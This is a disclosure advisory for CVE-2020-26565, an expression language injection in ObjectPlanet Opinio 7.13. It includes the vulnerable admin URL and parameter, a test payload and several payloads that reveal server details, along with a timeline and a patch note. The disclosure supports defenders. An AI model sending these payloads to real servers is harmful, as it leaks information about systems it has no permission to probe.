ObjectPlanet Opinio 7.13 Expression Language Injection

2021.08.01
Credit: Daniel Tan
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng # CVE: CVE-2020-26565 # Exploit Title: ObjectPlanet Opinio version 7.13 allows expression language injection # Vendor Homepage: https://www.objectplanet.com/opinio/ # Software Link: https://www.objectplanet.com/opinio/ # Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng # CVE: CVE-2020-26565 # Timeline - September 2020: Initial discovery - October 2020: Reported to ObjectPlanet - November 2020: Fix/patch provided by ObjectPlanet - July 2021: CVE-2020-26565 # 1. Introduction Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed. # 2. Vulnerability Details ObjectPlanet Opinio before version 7.13 is vulnerable to expression language injection # 3. Proof of Concept ### Expression Language Injection leading to sensitive information disclosure ### Step 1: URL: /opinio/admin/permissionList.do?userId=1&from=$%7b7%2a7%7d Payload: ${7*7} - URL encoded The "from" parameter is vulnerable to Expression Language injection and this was validated by inspecting the loaded page source which executed the URL encoded payload to return 49 This vulnerability can be used to enumerate the sensitive information about the web server. Some examples of payloads that executed successfully are: - ${pageContext.request.serverName} - returned server name - ${pageContext.serveletContext.serverInfo} - returned server information - ${pageContext.servletConfig.class} - returned information about the Apache server This vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html ------------------------------------------------------- # 4. Remediation Apply the latest fix/patch from objectplanet. # 5. Credits Timothy Tan (https://sg.linkedin.com/in/timtjh) Khor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/) Yu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/) Daniel Tan (https://www.linkedin.com/in/dantanjk/)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top